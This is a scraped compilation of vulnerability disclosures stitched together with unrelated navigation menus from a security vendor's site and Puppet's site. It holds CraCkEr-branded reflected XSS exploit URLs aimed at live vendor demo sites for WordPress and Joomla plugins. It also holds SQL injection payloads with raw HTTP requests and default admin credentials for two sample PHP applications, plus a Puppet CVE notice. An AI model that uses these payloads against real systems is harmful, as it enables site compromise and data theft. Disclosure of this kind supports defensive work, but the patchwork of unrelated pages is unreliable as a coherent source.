WordPress eCommerce Product Catalog plugin version 3.0.70 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/ecommerce-product-catalog/                           ││  Vendor   : impleCode - implecode.com                                                  ││  Software : WordPress eCommerce Product Catalog 3.0.70                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'product_category' is vulnerable to XSSPath: /product-category/clothing/sunglasses/men/ https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1[-] Done

WordPress eCommerce Product Catalog 3.0.70 Cross Site Scripting

WordPress / Joomla JReviews extension version 4.1.5 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : ClickFWD LLC. - jreviews.com                                               ││  Software : WordPress JReviews 4.1.5                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'listview' is vulnerable to XSSPath: /top-user-rated-listings https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1URL parameter 'format' is vulnerable to XSSPath: /advanced-search/search-resultshttps://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1[-] Done

WordPress / Joomla JReviews 4.1.5 Cross Site Scripting

Joomla Vik Rent Car extension version 1.14 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Rent Car 1.14                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘parameter 'returnplace' is vulnerable to XSSPath: index.php/en/search-your-car https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc&Itemid=104&categories=2&goon=Continueparameter 'categories' is vulnerable to XSSPath: index.php/en/search-your-carhttps://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=3&task=showprc&Itemid=104&categories=o41bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eml8z0&goon=Continue[-] Done

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 3 – 9)

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.

CVE-2022-36635

Command injection is possible in the puppetlabs-mysql module prior to version 13.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise.

*   Forge
*   Documentation
*   Get Support
*   Education
*   Events
*   Shop

BlogContact Sales

Try Puppet 

*   Why Puppet
*   Products
*   Services
*   Open Source
*   Resources
*   Partners
*   About Puppet by Perforce

*   Why Puppet
*   Products
*   Services
*   Open Source
*   Resources
*   Partners
*   About Puppet by Perforce
*   
*   Forge
*   Documentation
*   Get Support
*   Education
*   Events
*   Shop

Search Puppet.com

Puppet is the industry standard for IT automation.

Modernize, manage and bring your hybrid infrastructure into compliance through Puppet's powerful continuous automation.

*   Why Puppet 
*   Try Puppet 

**Guidebook**

*   What is Configuration Management
*   What is IT Compliance
*   What is IT Automation

**Use Cases**

*   Application delivery & operations
*   Continuous configuration automation
*   Continuous compliance
*   Continuous delivery
*   Patch management
*   Puppet for government
*   IT process automation & orchestration
*   Windows infrastructure automation

**Get Puppet Enterprise**

First 10 nodes are free!

*   Try it now 
*   Request a demo 

**Products**

*   Puppet Enterprise
*   Continuous Delivery for Puppet Enterprise
*   Puppet Comply

**Pricing & Packaging**

*   Pricing
*   Support services plans
*   Professional services

**Integrations**

*   Amazon Web Services
*   Google Cloud Platform
*   Hashicorp
*   PowerShell DSC
*   Windows Azure
*   ServiceNow
*   Splunk
*   VMware
*   All integrations

**Puppet Education**

Puppet Education is your learning portal for tools and best practices to address common business challenges.

*   Puppet Education 

**Professional services**

*   Start automating
*   Accelerate delivery
*   Integrate your toolchain
*   Harden infrastructure
*   Partner for success
*   Scale DevOps
*   All professional services

**Support**

*   Puppet support
*   Technical support packages
*   Technical account management

**Custom consulting services**

Get up and running quickly with a custom solution that addresses your unique business goals and easily allows for growth as your needs evolve.

*   Learn more 

**Puppet Forge**

Find thousands of component modules built by the community and guidance on using them in your own infrastructure.

*   Visit Puppet Forge 

**Ecosystem**

*   Puppet developer experience
*   Trusted contributors
*   GitHub
*   Vox Pupuli

**Open Source Projects**

*   Open source Puppet
*   Bolt
*   All open source projects
*   Compare our enterprise products

**Community**

*   Community
*   Puppet Champions
*   Puppet Test Pilots
*   Community calendar
*   Community Slack
*   Pulling the Strings Podcast
*   Puppet and Perforce Community FAQ

**Contribute**

*   Contribute written content
*   Contribute to open source projects
*   Puppet Idea Portal

**State of DevOps Report**

Since launching our first DevOps survey in 2012, we’ve learned a lot about the power of DevOps to transform organizations.

*   State of DevOps retrospective
*   Scaling DevOps

*   Get the 2021 State of DevOps Report 

**Product Documentation**

*   Puppet Enterprise
*   Continuous Delivery for Puppet Enterprise
*   Puppet Comply
*   Puppet Remediate
*   All documentation

**Resource library**

*   Blog
*   Ebooks
*   Reports
*   Solution briefs
*   Videos
*   Webinars
*   White papers

**Customers**

*   Our customers
*   Customer videos
*   Customer stories

**Partners**

*   Technology partners
*   Channel partners
*   Solution providers
*   Become a partner
*   Partner Portal login

**Featured Partners**

**About Us**

Puppet automates your infrastructure so you can innovate. We find, fix, and predict in order to prevent surprises and maintain your desired state.

**Puppet by Perforce**

*   Mission
*   Diversity, equity & inclusion
*   Contact Us

**Working at Puppet by Perforce**

*   Open positions

**Press & news**

*   Press room
*   Press releases
*   News mentions

**Events**

It's our community that makes Puppet great. Connect with Puppet users and employees.

*   Watch On Demand: Puppetize Digital 2021
*   All events

*   **Posted 2022-10-03**
*   **Assessed Risk Level: High**
*   **CVSS 3.1 Base Score: 8.4**

Command injection is possible in the puppetlabs-mysql module prior to version 13.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise.

**Status:**

**Affected software versions:**

*   Puppetlabs-mysql Module <13.0.0

**Resolved in:**

*   Puppetlabs-mysql Module 13.0.0

CVE-2022-3276: CVE-2022-3276 - Puppetlabs-mysql Command Injection

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=maintenance/manage_category.

Permalink

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: hegeoo

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=maintenance/manage\_category&id=

Vulnerability location: /pet\_shop/admin/?page=maintenance/manage\_category&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=maintenance/manage\_category&id=4%27%20and%20length(database())%20=11--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=maintenance/manage\_category&id\=4%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close

length=11 

length=12

CVE-2022-41377: bug_report/SQLi-2.md at main · hegeoo/bug_report

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=inventory/manage_inventory.

Permalink

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: hegeoo

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=inventory/manage\_inventory&id=

Vulnerability location: /pet\_shop/admin/?page=inventory/manage\_inventory&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=inventory/manage\_inventory&id=8%27%20and%20length(database())%20=11--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=inventory/manage\_inventory&id\=8%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close

length=11 

length=12

CVE-2022-41378: bug_report/SQLi-1.md at main · hegeoo/bug_report

Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editclient.php?id=.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: f0ward

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/editclient.php?id=

Vulnerability location: /diagnostic/editclient.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/editclient.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /diagnostic/editclient.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-42073: bug_report/SQLi-1.md at main · f0w4rD/bug_report

Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editcategory.php?id=.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: f0ward

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/editcategory.php?id=

Vulnerability location: /diagnostic/editcategory.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/editcategory.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /diagnostic/editcategory.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

Tag

#sql